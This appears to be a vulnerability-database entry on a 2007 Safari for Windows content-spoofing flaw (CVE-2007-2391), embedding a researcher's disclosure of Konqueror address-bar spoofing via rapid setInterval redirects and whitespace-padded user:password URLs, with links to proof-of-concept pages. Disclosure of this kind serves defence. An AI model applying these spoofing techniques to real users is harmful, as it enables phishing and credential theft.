Safari 3.0.1 (522.12.12) on Windows 2003 SE SP2 is reported vulnerable; other versions may also be affected. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. There is a vulnerability in the implementation of Safari for Windows, and remote attackers may use this vulnerability to perform malicious operations on the user's machine. If a user is tricked into visiting content on a malicious site, an attacker can forge content on a legitimate site, steal user credentials, or perform other phishing attacks.
There are vulnerabilities in Konqueror that allow an attacker to
spoof the URL adddress bar.
The first example uses setInterval() call with relatively small interval
value (e.g. 0) to change window.location property. A browser is
entrapped within the attacking web site while the user thinks that
browser actually left the page.
http://alt.swiecki.net/konq2.html
The very similar problem affects Apple Safari (3.0.3) but due to
recent changes in Safari code (vide
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2398 ) it's a lot harder to
conduct a successful attack - URL address bat content changes so
frequently so the attack is revealed to the user (variants of attack are
currently under investigation).
The second one is based on the http URI scheme which allows embedding
user/password parameters into it, i.e. http://user:password@domain.com.
Such parameters can contain whitespaces, so the attack vector is quite
obvious.
http://alt.swiecki.net/konq3.html
Tested with Konqueror 3.5.7 on Linux 2.6
The snapshot from my dekstop:
http://alt.swiecki.net/konq3.png
--
Robert Swiecki
VAR-200706-0341 | CVE-2007-2391 | Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Apple Safari Beta 3.0.1 for Windows allows remote attackers to inject arbitrary web script or HTML via a web page that includes a windows.setTimeout function that is activated after the user has moved from the current page. During such an attack, the originating URL and window title reportedly still display the originating domain rather than the attacking domain.
This issue affects Safari 3.0 (522.11.3) on Windows 2003 SE SP2 and Windows XP SP2.
NOTE: Apple has released Safari 3.0.1 Beta for Windows